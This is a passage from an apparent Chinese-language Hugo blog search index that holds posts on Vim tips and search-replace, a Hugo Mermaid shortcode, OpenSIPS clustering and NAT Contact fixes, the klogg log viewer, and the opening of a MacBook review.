对于windows和mac来说,只有一个系统剪贴板,对于linux有两个。\n剪贴板,鼠标选择剪贴板 剪贴板,选择之后复制剪贴板 如下图,我用鼠标选择了12345, 但是没有按ctrl + c, 这时候你打开nvim, 执行:reg, 可以看到注册器","title":"和系统剪贴板进行交互"},{"content":"在vscode中,可以选中一个目录,然后在目录中搜索对应的关键词,再查找到对应文件中,然后做替换。\n在vim也可以这样做。\n但是这件事要分成两步。\n根据关键词,查找文件 对多个文件进行替换 搜索关键词 搜索关键词可以用grep, 或者vim自带的vimgrep。\n但是我更喜欢用ripgrep,因为速度很快。\nripgrep也有对应的vim插件 https://github.com/jremmen/vim-ripgrep\n例如要搜索关键词 key1, 那么符合关键词的文件将会被放到quickfix列表中。\n:Rg key1 可以用 :copen 来打开quickfix列表。\n替换 cdo :cdo %s/key1/key2/gc c表示在替换的时候,需要手工确认每一项。\n在替换的时候,可以输入\ny (yes)执行替换 n (no)忽略此处替换 a (all)替换此处和之后的所有项目 q (quit) 退出替换过程 l (last) 替换此处后退出 ^E 向上滚动屏幕 ^Y 向下滚动屏幕 ","permalink":"https://wdd.js.org/vim/search-dir-replace/","summary":"在vscode中,可以选中一个目录,然后在目录中搜索对应的关键词,再查找到对应文件中,然后做替换。\n在vim也可以这样做。\n但是这件事要分成两步。\n根据关键词,查找文件 对多个文件进行替换 搜索关键词 搜索关键词可以用grep, 或者vim自带的vimgrep。\n但是我更喜欢用ripgrep,因为速度很快。\nripgrep也有对应的vim插件 https://github.com/jremmen/vim-ripgrep\n例如要搜索关键词 key1, 那么符合关键词的文件将会被放到quickfix列表中。\n:Rg key1 可以用 :copen 来打开quickfix列表。\n替换 cdo :cdo %s/key1/key2/gc c表示在替换的时候,需要手工确认每一项。\n在替换的时候,可以输入\ny (yes)执行替换 n (no)忽略此处替换 a (all)替换此处和之后的所有项目 q (quit) 退出替换过程 l (last) 替换此处后退出 ^E 向上滚动屏幕 ^Y 向下滚动屏幕 ","title":"搜索工作目录下的文件并替换"},{"content":" Info C表示按住Ctrl, C-o表示同时按住Ctrl和o 1. 在tmux中 vim-airline插件颜色显示不正常 解决方案:\nexport TERM=screen-256color 2. buffer相关操作 :ls # 显示所有打开的buffer :b {bufferName} #支持tab键自动补全 :bd # 关闭当前buffer :bn # 切换到下一个buffer :bp # 切换到上一个buffer :b# # 切换到上一个访问过的buffer :b1 # 切换到buffer1 :bm # 切换到最近修改过的buffer :sb {bufferName} # 上下分屏 :vert sb {bufferName} # 左右分屏 3. 跳转到对应的符号上 下面这种符号,一般都是成双成对的,只要在其中一个上按%, 就会自动跳转到对应的符号\n() [] {} 4. 关闭netrw的banner 如果熟练地使用了netrw,就可以把默认开启的banner给关闭掉。\nlet g:netrw_banner = 0 let g:netrw_liststyle = 3 let g:netrw_winsize = 25 5. 如何同时保存所有发生变化的文件? 把所有发生变化的文件给保存 :wa 把所有发生变化的文件都保存,然后退出vim :xa 退出vim, 所有发生变化的文件都不保存,:qa! 6. 插入当前时间 :r!date 7. 光标下的文件跳转 按gf可以跳转光标下的文件\nimport {say} from \u0026#39;./api\u0026#39; 也有可能跳的不准确,或者找不到,因为vim不知道文件后缀\n:set suffixesadd+=.js 8. 
文件对比 如果你安装了vim, vimdiff就会自动携带\nvimdiff a.txt b.txt 9. 在插入模式快速删除 C-h 删除前一个字符 C-w 删除前一个单词 C-u 删除到行首 10. 在多行末尾增加特定的字符 例如下面的命令,可以在多行末尾增加;\n:%s/$/;/ 11. 对撤销进行撤销 u可以用来撤销,C-r可以用来对撤销进行撤销\n12. 重新读取文件 假如你对一个文件进行了一些修改,但是还没有保存,这时你想丢弃这些修改,如果用撤销的话,太麻烦。\n你可以用下面的命令,让vim重新读取磁盘上的文件,覆盖当前buffer中的文件。\n:e! 13. 对当前buffer执行外部命令 例如对go代码进行格式化\n:!go fmt % 也可以是一个json文件,我们可以用行选中之后执行:'\u0026lt;,'\u0026gt;!jq, 如果需要对全文进行json格式化,可以使用:%!jq\n{\u0026#34;name\u0026#34;:\u0026#34;wdd\u0026#34;,\u0026#34;age\u0026#34;:1} { \u0026#34;name\u0026#34;: \u0026#34;wdd\u0026#34;, \u0026#34;age\u0026#34;: 1 } Warning !和命令之间不能有空格 14. 只读模式打开文件 只读模式打开文件: vim -R file 禁止修改打开文件: vim -M file 15. 显示或者隐藏特殊字符 :set list :set nolist 16. 把另一个文件读取到当前buffer里面 b.txt是另一个文件\n# 读取到光标的位置 :read b.txt # 读取到当前buffer的开头 :0read b.txt # 读取到当前buffer的结尾 :$read b.txt 17. 把当前文件的一部分写入到另一个文件中 # 把当前文件写入到c.txt, 如果c.txt存在,则写入失败 :write c.txt # 把当前文件写入到c.txt, 如果c.txt存在,则强制写入 # 注意这里!必须紧跟着write, 并且空格是必须的,否则就是执行外部命令了 :write! c.txt # 把当前文件的当前行到文件末尾写入到c.txt :.$write c.txt # 把当前文件以追加的方式写入到另一个文件中 :write \u0026gt;\u0026gt;c.txt 18. 自带文件浏览器的必背命令 :Sex # 文件浏览器上下分布 :Vex # 文件浏览器左右分布 F1 打开帮助信息 % 创建文件 d 创建目录 D 删除文件或者目录 R 文件重命名 gh 隐藏以.开头的文件 - 返回上一级 t 用新的标签页面打开文件 c 把浏览的目录设置为当前工作的目录 19. 执行命令后,快速进入插入模式 C 从光标处删除到行尾,然后进入插入模式 S 清空当前行的内容,然后进入插入模式 s 删除光标下的字符,然后进入插入模式 O\t在当前行上插入一行,然后进入插入模式 o\t在当前行下插入一行,然后进入插入模式 I\t光标移动到当前行的第一个非空白字符前,然后进入插入模式 A\t光标移动到当前行的最后一个字符后,然后进入插入模式 20. 必会的几个寄存器 有名寄存器 a-z 黑洞寄存器 _ 表达式寄存器 = 当前文件名寄存器 % 上次查找的模式寄存器 / 复制专用寄存器 0 C-r 是用来调用寄存器的。比如说我想粘贴当前文件名,我只需要按C-r %, 就可以自动粘贴到当前的文件中\n21. 基于tag的跳转 C-] 跳到对应tag上 C-o 跳回来 C-t 跳回来 C-w ] 在新的window中打开标签 C-w } 预览 pclose 关闭预览 22. html标签删除 dit 删除标签内部的元素 dat 删除标签 23. 原始格式粘贴 如果粘贴到vim中的文本缩进出现问题,\n:set paste 然后再执行C-v粘贴\n取消粘贴模式用 :set nopaste\n24. 按列删除或者按列保留 # 只保留第二列 :%!awk \u0026#39;{print $2}\u0026#39; # 删除第二列 :%!awk \u0026#39;{$2=\u0026#34;\u0026#34;;print $0}\u0026#39; 25. 查找多个关键词 /key1\|key2\|key3 26. 快速将光标所在行移动到屏幕中央 zz 26. 
窗口快捷键 工作区切分窗口命令 s 水平切分窗口,新窗口仍然显示当前缓冲区 v 垂直切分窗口,新窗口仍然显示当前缓冲区 sp {file} 水平切分为当前窗口,新窗口中载入file vsp {file} 垂直切分窗口,并在新窗口载入file 窗口之间切换 w 在窗口间循环切换 h 切换到左边窗口 l 切换到右边窗口 j 切换到下边的窗口 k 切换到上边的窗口 窗口关闭 :clo[se] 关闭活动窗口 :on[ly] 关闭其他窗口 窗口改变大小 = 使所有窗口等宽等高 _ 最大化活动窗口的高度 | 最大化活动 27. 9种插入模式 i 进入插入模式,所输入新的内容将会在正常模式所在光标的前面 a 进入插入模式,所输入的新的内容将会在正常模式所在光标的后面 你知道从插入模式退出的时候,光标会向前移动一个字符吗?\n进入插入模式的技巧\ni 在光标前插入 a 在光标后插入 A 在行的末尾进入插入 I (大写的i), 在行的第一个非空白字符前进入插入模式 C 删除光标后的所有字符,然后进入插入模式 s 删除光标后的一个字符,然后进入插入模式 S 清空当前行,然后进入插入模式 o 在当前行的下面一行新建一行,并进入插入模式 O 在当前行的上面一行新建一行,并进入插入模式 28. 算数运算 ctrl a 对数字进行加运算, 如果光标不在数字上,将会自动向后移动道对应的数字上 ctrl x 对数字进行减运算 29. 可视模式快捷键 v 激活面向字符的可视模式 再按一次,可以退出 V 激活面向行的可视模式, 再按一次可以退出 ctrl v 激活面向列的可视模式 gv 重选上次的选区 o 移动选区的端点 30. 把光标所在的单词插入到Ex C-r C-w 31. 全局 文件另存为 :saveas filename 关闭当前窗口 :close 32. 光标移动 移动光标到页面顶部,中部,底部 H,M,L 移动到下个单词开头,结尾 w,e 移动到上个单词开头 b 移动光标 上下左右 k,j,h,l 移动到匹配的括号 % 移动到行首 0 移动到行首非空白字符 ^ 移动到行尾非空白字符 g 移动到行尾 $ 移动到文件第一行 gg 移动到文件最后一行 G 移动到第10行 10G 移动屏幕使光标居中 zz 跳转到上一次的位置 ctrl+o 例如你在159行,然后你按了gg, 光标调到了第一行,然后你按ctrl+o, 光标会回到159行 跳转到下一次的位置 ctrl+i 跳转到下个同样单词的地方 * 跳转到上个同样单词的地方 # 跳到字符a出现的位置 fa, Fa 调到字符a出现的前一个位置 ta, Ta 跳到之前的位置 `` 跳到之前修改的位置 `. 跳到选区的起始位置 `\u0026lt; 跳到选区的结束位置 `\u0026gt; 33. 滚动屏幕 向下,向上滚动一屏 ctrl+b, ctrl+f 向下,向上滚动半屏 ctrl+d, ctrl+u 34. 插入模式 光标前、后插入 i,a 行首,行尾插入 I, A 在当前行上、下另一起行插入 O, o 从当前单词末尾插入 ea 退出插入模式 esc 删除前一个单词 ctrl+w 删除到行首 ctrl+u 35. 编辑 替换光标下的字符 r 将下一行合并到当前行 J 将下一行合并到当前行,并一种中间的空白字符 gJ 清空当前行,并进入插入模式 cc 清空当前单词,并进入插入模式 cw 撤销修改 u 删除光标下的一个字符,然后进入插入模式 s 36. 选择文本 普通光标选择, 进入选择文本模式 v 行选择,进入选择文本模式 V 块选择,进入选择文本模式 ctrl+v 在多行行首插入注释# ctrl+v 然后选择快,然后输入I, 然后输入#, 然后按esc 注意,输入I指令时,光标只会定位到一个位置,编辑的内容也只是在一个位置,但是按了esc后,多行都会出现# 进入选择文本模式之后 选择光标所在单词(光标要先位于单词上) aw 选择光标所在()区域,包括(), 光标要先位于一个括号上 ab 选择光标所在[]区域,包括[], 光标要先位于一个括号上 aB 选择光标所在()区域,不包括(), 光标要先位于一个括号上 ib 选择光标所在[]区域,不包括[], 光标要先位于一个括号上 iB 退出可视化区域 esc 37. 选择文本命令 向左右缩进 \u0026lt;, \u0026gt; 复制 y 剪切 d 大小写转换 ~ 38. 标记 显示标记列表 :marks 标记当前位置为a ma 跳转到标记a的位置 `a 39. 
剪切删除 剪切当前行 dd 剪切2行 2dd 剪切当前单词 dw 从光标所在位置剪切到行尾 D, d$ 剪切当前字符 x 删除单引号中的内容 di\u0026rsquo; da’ 删除包括' 删除双引号中的内容 di\u0026quot; da\u0026quot; 删除包括\u0026quot; 删除中括号中的内容 di[ da[ 删除包括[ 删除大括号中的内容 di{ da{ 删除包括{ 删除括号中的内容 di( da( 删除包含( 从当前光标位置,删除到到字符a dta 40. global命令 删除所有不包含匹配项的文本行 :v/re/d re可以是字符,也可以是正则 显示所有不包含匹配项的文本行 :v/re/p re可以是字符,也可以是正则 删除包含匹配项的行 :g/re/d re可以是字符,也可以是正则 显示所有包含匹配项的行 :g/re/p re可以是字符,也可以是正则 41. 文本对象 当前单词 iw 当前单词和一个空格 aw 当前句子 is 当前句子和一个空格 as 当前段落 ip 当前段落和一个空行 ap 一对圆括号 a) 或 ab 圆括号内部 i) 或 ib 一对花括号 a}或 aB 花括号内部 i}或 iB a表示匹配两点和两点之间的字符), }, ], \u0026gt; , ‘, “, `, t(xml) i表示匹配两点内部之间的字符 42. 复制 复制当前行 yy 复制2行 2yy 复制当前单词 yw 从光标所在位置复制到行尾 y$ 复制单引号中的内容 yi\u0026rsquo; ya\u0026rsquo; 复制包括' 复制双引号中的内容 yi\u0026quot; ya” 复制包括\u0026quot; 复制中括号中的内容 yi[ ya[ 复制包括[ 复制大括号中的内容 yi{ ya{ 复制包括{ 43. 粘贴 在光标后粘贴 p 在光标前粘贴 P 44. 保存退出 保存 w 保存并退出 wq 不保存退出 q! 保存所有tab页并退出 wqa 46. 查找 向下查找key /key 向上查找key ?key 下一个key n 上一个key N 移除搜索结果高亮 :noh 设置搜索高亮 :set hlsearch 统计当前模式匹配的个数 :%s///gn 47. 字符串替换 全文将old替换为new %s/old/new/g 全文将old替换为new, 但是会一个一个确认 %s/old/new/gc 48. 多文件搜索 多文件搜索 :vimgrep /key/ {file} vimgrep /export/ */ 切换到下一个文件 cn 切换到上一个文件 cp 查看搜索结果列表 copen 查看文件缓冲区 :ls 49. 窗口分割 水平分割窗口 :split 默认split仅针对当前文件,如果在新窗口打开新的文件,可以:split file 垂直分割窗口 :vsplit 打开空白的窗口 :new 关闭分割的窗口 ctrl+wq, :close 有时候ctrl+wq不管用,需要用close 窗口之间切换 ctrl+ww 切换到左边窗口 ctrl+wh 切换到右边窗口 ctrl+wl 切换到下边窗口 ctrl+wj 切换到上边窗口 ctrl+wk 关闭所有窗口 :qall 这表示 \u0026ldquo;quit all\u0026rdquo; (全部退出)。如果任何一个窗口没有存盘,Vim 都不会退出。同时光 标会自动跳到那个窗口,你可以用 \u0026ldquo;:write\u0026rdquo; 命令保存该文件或者 \u0026ldquo;:quit!\u0026rdquo; 放弃修改。 保存所有窗口修改后的内容 :wall 如果你知道有窗口被改了,而你想全部保存 关闭所有窗口,放弃所有修改 :qall! 注意,这个命令是不能撤销的。 保存所有修改,然后退出vim :wqall 窗口更多内容 http://vimcdoc.sourceforge.net/doc/usr_08.html#usr_08.txt\n50. 宏 录制宏a qa 停止录制宏 q 51. 标签页 新建标签页 tabnew 在新标签页中打开file tabnew file 切换到下个标签页 gt 切换到上个标签页 gT 关闭当前标签页 :tabclose, :tabc 关闭其他标签页 :tabo, :tabonly 在所有标签页中执行命令 :tabdo commad :tabdo w 52. 
文本折叠 折叠文本内容 zfap http://vimcdoc.sourceforge.net/doc/usr_28.html#usr_28.txt 打开折叠 zo 关闭折叠 zc 展开所有折叠 zr 打开所有光标行上的折叠用 zO 关闭所有光标行上的折叠用 zC 删除一个光标行上的折叠用 zd 删除所有光标行上的折叠用 zD 53. 设置 设置vim编辑器的宽度 set columns=200 54. 自动补全 使用自动补全的下一个列表项 ctrl+n 使用自动补全的上一个列表项 ctrl+p 确认当前选择项 ctrl+y 还原最早输入项 ctrl+e 55. 杂项 在vim中执行外部命令 :!ls -al 查看当前光标所在行与百分比 ctrl+g 挂起vim, 使其在后台运行 ctrl+z 查看后台挂起的程序 jobs 使挂起的vim前台运行 fg 如果有多个后台挂起的任务, 则需要指定任务序号,如 :fg %1 在每行行尾添加字符串abc :%s/$/abc 在每行行首添加字符串abc :%s/^/abc 每行行尾删除字符串abc :%s/$/abc 每行行首删除字符串abc :%s/^/abc 删除含有abc字符串的行 :g/abc/d 删除每行行首到特定字符的内容,非贪婪匹配 : %s/^.{-}abc// var = abc123, 会删除var = abc 调换当前行和它的下一行 ddp 全文格式化 gg 跳到第一行 shift v shift g = 参考\nhttps://vim.rtorr.com/lang/zh_cn http://vimcdoc.sourceforge.net/doc/help.html https://www.oschina.net/translate/learn-vim-progressively ","permalink":"https://wdd.js.org/vim/vim-tips/","summary":"Info C表示按住Ctrl, C-o表示同时按住Ctrl和o 1. 在tmux中 vim-airline插件颜色显示不正常 解决方案:\nexport TERM=screen-256color 2. buffer相关操作 :ls # 显示所有打开的buffer :b {bufferName} #支持tab键自动补全 :bd # 关闭当前buffer :bn # 切换到下一个buffer :bp # 切换到上一个buffer :b# # 切换到上一个访问过的buffer :b1 # 切换到buffer1 :bm # 切换到最近修改过的buffer :sb {bufferName} # 上下分屏 :vert sb {bufferName} # 左右分屏 3. 跳转到对应的符号上 下面这种符号,一般都是成双成对的,只要在其中一个上按%, 就会自动跳转到对应的符号\n() [] {} 4. 关闭netrw的banner 如果熟练的是用了netrw,就可以把默认开启的banner给关闭掉。\nlet g:netrw_banner = 0 let g:netrw_liststyle = 3 let g:netrw_winsize = 25 5. 如何同时保存所有发生变化的文件? 
把所有发生变化的文件给保存 :wa 把所有发生变化的文件都保存,然后退出vim :xa 退出vim, 所有发生变化的文件都不保存,:qa!","title":"1001个Vim高级技巧 - 0-55"},{"content":"增加mermaid shortcodes 在themes/YourTheme/layouts/shortcodes/mermaid.html 增加如下内容\n\u0026lt;script async type=\u0026#34;application/javascript\u0026#34; src=\u0026#34;https://cdn.jsdelivr.net/npm/mermaid@9.1.1/dist/mermaid.min.js\u0026#34;\u0026gt; var config = { startOnLoad:true, theme:\u0026#39;{{ if .Get \u0026#34;theme\u0026#34; }}{{ .Get \u0026#34;theme\u0026#34; }}{{ else }}dark{{ end }}\u0026#39;, align:\u0026#39;{{ if .Get \u0026#34;align\u0026#34; }}{{ .Get \u0026#34;align\u0026#34; }}{{ else }}center{{ end }}\u0026#39; }; mermaid.initialize(config); \u0026lt;/script\u0026gt; \u0026lt;div class=\u0026#34;mermaid\u0026#34;\u0026gt; {{.Inner}} \u0026lt;/div\u0026gt; 在blog中增加如下代码 Warning 注意下面的代码,你在实际写的时候,要把 /* 和 */ 删除 {{/*\u0026lt; mermaid align=\u0026#34;left\u0026#34; theme=\u0026#34;neutral\u0026#34; */\u0026gt;}} pie title French Words I Know \u0026#34;Merde\u0026#34; : 50 \u0026#34;Oui\u0026#34; : 35 \u0026#34;Alors\u0026#34; : 10 \u0026#34;Non\u0026#34; : 5 {{/*\u0026lt; /mermaid \u0026gt;*/}} pie title French Words I Know \"Merde\" : 50 \"Oui\" : 35 \"Alors\" : 10 \"Non\" : 5 sequenceDiagram title French Words I Know autonumber Alice-\u003e\u003eBob: hello Bob--\u003e\u003eAlice: hi Alice-\u003eBob: talking ","permalink":"https://wdd.js.org/posts/2022/05/02-hugo-add-mermaid/","summary":"增加mermaid shortcodes 在themes/YourTheme/layouts/shortcodes/mermaid.html 增加如下内容\n\u0026lt;script async type=\u0026#34;application/javascript\u0026#34; src=\u0026#34;https://cdn.jsdelivr.net/npm/mermaid@9.1.1/dist/mermaid.min.js\u0026#34;\u0026gt; var config = { startOnLoad:true, theme:\u0026#39;{{ if .Get \u0026#34;theme\u0026#34; }}{{ .Get \u0026#34;theme\u0026#34; }}{{ else }}dark{{ end }}\u0026#39;, align:\u0026#39;{{ if .Get \u0026#34;align\u0026#34; }}{{ .Get \u0026#34;align\u0026#34; }}{{ else }}center{{ end }}\u0026#39; }; mermaid.initialize(config); 
\u0026lt;/script\u0026gt; \u0026lt;div class=\u0026#34;mermaid\u0026#34;\u0026gt; {{.Inner}} \u0026lt;/div\u0026gt; 在blog中增加如下代码 Warning 注意下面的代码,你在实际写的时候,要把 /* 和 */ 删除 {{/*\u0026lt; mermaid align=\u0026#34;left\u0026#34; theme=\u0026#34;neutral\u0026#34; */\u0026gt;}} pie title French Words I Know \u0026#34;Merde\u0026#34; : 50 \u0026#34;Oui\u0026#34; : 35 \u0026#34;Alors\u0026#34; : 10 \u0026#34;Non\u0026#34; : 5 {{/*\u0026lt; /mermaid \u0026gt;*/}} pie title French Words I Know \"","title":"hugo博客增加mermaid 绘图插件"},{"content":"共享分机注册信息有两种方式\n集群使用相同的数据库,多个节点实时读取数据 优点:使用简单,即使所有节点重启,也能立即从数据库中恢复分机注册数据 缺点:对数据库过于依赖,一旦数据库出现性能瓶颈,则会立即影响所有的呼叫 是用cluster模块,不使用数据库,通过opensips自带的二进制同步方式 优点:不用数据库,消息处理速度快,减少对数据库的压力 缺点:一旦所有节点挂掉,所有的分机注册信息都会损失。但是挂掉所有节点的概率还是比较小的。 今天要讲的方式就是通过cluster的方式进行共享注册信息的方案。\n假设有三个节点:\n在其中一个节点上注册的分机信息会同步给其他的节点 假设其中节点a重启了,节点a会自动选择b或者c来拉取第一次初始化的分机信息 举例来说:\n8001分机在b上注册成功 b把8001的注册信息通过cluster模块通知给a和c 8002分机在a上注册成功 a把8002的注册信息通过cluster模块通知给b和c 此时整个集群有两个分机8001和8002 节点c突然崩溃重启 节点c重启之后,向b发出请求,获取所有注册的分机 节点b像节点c推送全量的分机注册信息 此时三个节点又恢复同步状态 cluster表设计:\n空的字段我就没写了,flags字段必须设置为seed, 这样节点重启后,才知道要像哪个节点同步全量数据 id,cluster_id,node_id,url,state,flags 1,1,1,bin:a:5000,1,seed 2,1,2,bin:b:5000,1,seed 3,1,3,bin:c:5000,1,seed 脚本修改:\n# 增加 bin的listen, 对应cluster表的url listen=bin:192.168.2.130:5000 # 加载proto_bin和clusterer模块 loadmodule \u0026#34;proto_bin.so\u0026#34; loadmodule \u0026#34;clusterer.so\u0026#34; modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql:xxxx\u0026#34;) # 设置数据库地址 modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;current_id\u0026#34;, 1) # 设置当前node_id modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;full-sharing-cluster\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;location_cluster\u0026#34;, 1) # 设置当前的集群id 其他操作保持原样,opensips就会自动同步分机数据了。\n","permalink":"https://wdd.js.org/opensips/ch9/cluster-share-location/","summary":"共享分机注册信息有两种方式\n集群使用相同的数据库,多个节点实时读取数据 优点:使用简单,即使所有节点重启,也能立即从数据库中恢复分机注册数据 
缺点:对数据库过于依赖,一旦数据库出现性能瓶颈,则会立即影响所有的呼叫 是用cluster模块,不使用数据库,通过opensips自带的二进制同步方式 优点:不用数据库,消息处理速度快,减少对数据库的压力 缺点:一旦所有节点挂掉,所有的分机注册信息都会损失。但是挂掉所有节点的概率还是比较小的。 今天要讲的方式就是通过cluster的方式进行共享注册信息的方案。\n假设有三个节点:\n在其中一个节点上注册的分机信息会同步给其他的节点 假设其中节点a重启了,节点a会自动选择b或者c来拉取第一次初始化的分机信息 举例来说:\n8001分机在b上注册成功 b把8001的注册信息通过cluster模块通知给a和c 8002分机在a上注册成功 a把8002的注册信息通过cluster模块通知给b和c 此时整个集群有两个分机8001和8002 节点c突然崩溃重启 节点c重启之后,向b发出请求,获取所有注册的分机 节点b像节点c推送全量的分机注册信息 此时三个节点又恢复同步状态 cluster表设计:\n空的字段我就没写了,flags字段必须设置为seed, 这样节点重启后,才知道要像哪个节点同步全量数据 id,cluster_id,node_id,url,state,flags 1,1,1,bin:a:5000,1,seed 2,1,2,bin:b:5000,1,seed 3,1,3,bin:c:5000,1,seed 脚本修改:\n# 增加 bin的listen, 对应cluster表的url listen=bin:192.168.2.130:5000 # 加载proto_bin和clusterer模块 loadmodule \u0026#34;proto_bin.so\u0026#34; loadmodule \u0026#34;clusterer.so\u0026#34; modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql:xxxx\u0026#34;) # 设置数据库地址 modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;current_id\u0026#34;, 1) # 设置当前node_id modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;full-sharing-cluster\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;location_cluster\u0026#34;, 1) # 设置当前的集群id 其他操作保持原样,opensips就会自动同步分机数据了。","title":"集群共享分机注册信息"},{"content":"项目信息 github地址 https://github.com/variar/klogg\n1. 安装 klogg是个跨平台软件,windows, mac, linux都可以安装。具体安装方式参考github项目地址\n2. 界面布局 文件信息栏 日志栏 过滤器设置栏 过滤后的日志显示栏 3. 文件加载 klogg支持多种方式加载日志文件\n将日志文件拖动到klogg中 直接将常见的压缩包文件拖动到klogg中,klogger将会自动将其解压后展示 支持从http url地址下载日志,然后查看 支持从剪贴板复制日志,然后展示 4. 过滤表达式 因为klogg支持正则过滤,所以他的功能就非常强悍了。\n逻辑表达式\n表达式 例子 备注 与 and \u0026ldquo;open\u0026rdquo; and \u0026ldquo;close\u0026rdquo; 包含open,并且包含close 或 or \u0026ldquo;open\u0026rdquo; or \u0026ldquo;close\u0026rdquo; 包含open, 或者 close 非 not not(\u0026ldquo;open\u0026rdquo;) 不包含open 与或非同时支持复杂的运算,例如包含open 但是不包含close: \u0026quot;open\u0026quot; and not(\u0026quot;close\u0026quot;)\n5. 
快捷方式 klogg的快捷方式很多参考了vim, vim使用者非常高兴。\n键 动作 arrows 上下或者左右移动 [number] j/k 支持用j/k上下移动 h/l 支持用h/l左右移动 ^ or $ 滚动到某行的开始或者结尾 [number] g 跳到对应的行 entered G 跳到第一行 Shift+G 跳到最后一行 Alt+G 显示跳到某一行的对话框 \u0026rsquo; or \u0026quot; 在当前屏幕快速搜索 (forward and backward) n or N 向前或者向后跳 * or . search for the next occurrence of the currently selected text / or , search for the previous occurrence of the currently selected text f 流的方式,类似 tail -f m 标记某一行,标记后的行会自动加入过滤结果中 [ or ] 跳转到上一个或者下一标记点 + or - 调整过滤窗口的尺寸 v 循环切换各种显示模式- Matches: 只显式匹配的内容- Marks: 只显式标记的内容- Marks and Matchs:显示匹配和标记的内容 (Marks and Matches -\u0026gt; Marks -\u0026gt; Matches) F5 重新加载文件 Ctrl+S Set focus to search string edit box Ctrl+Shift+O 打开对话框去选择其他文件 参考 https://github.com/variar/klogg/blob/master/DOCUMENTATION.md ","permalink":"https://wdd.js.org/posts/2022/04/cipwms/","summary":"项目信息 github地址 https://github.com/variar/klogg\n1. 安装 klogg是个跨平台软件,windows, mac, linux都可以安装。具体安装方式参考github项目地址\n2. 界面布局 文件信息栏 日志栏 过滤器设置栏 过滤后的日志显示栏 3. 文件加载 klogg支持多种方式加载日志文件\n将日志文件拖动到klogg中 直接将常见的压缩包文件拖动到klogg中,klogger将会自动将其解压后展示 支持从http url地址下载日志,然后查看 支持从剪贴板复制日志,然后展示 4. 过滤表达式 因为klogg支持正则过滤,所以他的功能就非常强悍了。\n逻辑表达式\n表达式 例子 备注 与 and \u0026ldquo;open\u0026rdquo; and \u0026ldquo;close\u0026rdquo; 包含open,并且包含close 或 or \u0026ldquo;open\u0026rdquo; or \u0026ldquo;close\u0026rdquo; 包含open, 或者 close 非 not not(\u0026ldquo;open\u0026rdquo;) 不包含open 与或非同时支持复杂的运算,例如包含open 但是不包含close: \u0026quot;open\u0026quot; and not(\u0026quot;close\u0026quot;)\n5. 
快捷方式 klogg的快捷方式很多参考了vim, vim使用者非常高兴。\n键 动作 arrows 上下或者左右移动 [number] j/k 支持用j/k上下移动 h/l 支持用h/l左右移动 ^ or $ 滚动到某行的开始或者结尾 [number] g 跳到对应的行 entered G 跳到第一行 Shift+G 跳到最后一行 Alt+G 显示跳到某一行的对话框 \u0026rsquo; or \u0026quot; 在当前屏幕快速搜索 (forward and backward) n or N 向前或者向后跳 * or .","title":"klogg: 目前我最喜欢的日志查看工具"},{"content":"这个报错比较容易出现在tcp转udp的场景,可以看以下的时序图\nab之间用tcp通信,bc之间用udp通信。在通话建立后,c给b发送了bye请求,但是b发送给了c 477。正常来说b应该把bye转发给a.\n那么问题出在哪里呢?\n问题就出在update请求的响应上,update的响应200ok中带有Contact头,如果是Contact是个nat的地址,没有经过fixed nat, 那么b是无法直接给nat内部的地址发送请求的。\n处理的办法也很简单,就是在收到a返回的200ok时,执行fix_nated_contact()\n遇到这种问题,往往进入一种思维误区,就是在INVITE请求成功后,fix了nat Contact后,Contact头是不会变的。\n但是实际上,很多SIP请求,例如NOTIFY, UPDATE都会携带请求和响应都会携带Contact, 如果只处理了INVITE的Contact头,没有处理其他携带Contact的sip请求或者响应,就必然也会遇到类似的问题。\n我们知道SIP的Contact后,决定了序列化请求的request url。如果Contact处理的有问题,必然在按照request url转发的时候出现问题。\n综上所述:无论请求还是响应,都要考虑这个消息是否携带了Contact头,以及是否需要fix nat Contact。\n","permalink":"https://wdd.js.org/opensips/ch7/tm-send-failed/","summary":"这个报错比较容易出现在tcp转udp的场景,可以看以下的时序图\nab之间用tcp通信,bc之间用udp通信。在通话建立后,c给b发送了bye请求,但是b发送给了c 477。正常来说b应该把bye转发给a.\n那么问题出在哪里呢?\n问题就出在update请求的响应上,update的响应200ok中带有Contact头,如果是Contact是个nat的地址,没有经过fixed nat, 那么b是无法直接给nat内部的地址发送请求的。\n处理的办法也很简单,就是在收到a返回的200ok时,执行fix_nated_contact()\n遇到这种问题,往往进入一种思维误区,就是在INVITE请求成功后,fix了nat Contact后,Contact头是不会变的。\n但是实际上,很多SIP请求,例如NOTIFY, UPDATE都会携带请求和响应都会携带Contact, 如果只处理了INVITE的Contact头,没有处理其他携带Contact的sip请求或者响应,就必然也会遇到类似的问题。\n我们知道SIP的Contact后,决定了序列化请求的request url。如果Contact处理的有问题,必然在按照request url转发的时候出现问题。\n综上所述:无论请求还是响应,都要考虑这个消息是否携带了Contact头,以及是否需要fix nat Contact。","title":"opensips 477 Send failed (477/TM)"},{"content":"我之前写过一篇文章《macbook pro使用三年后的感受》,今天这篇文章是用4.5年的感受。\n再次梳理一下,中间遇到过的问题\n蝴蝶键盘很早有有些问题了,最近疫情在家,键盘被用坏了,J键直接坏了。只能外接键盘来用 屏幕下方出现淡红色的纹路,不太明显,基本不影响使用 中间我自己给macbook换过一次电池,换电池之前只要不插电,macbook很容易就关机了 风扇经常转,噪音有点吵,我已经觉得无所谓了 17年买这台电脑的时候,应该是9400左右。配置应该是最低配的 i5双核2.3Ghz, 
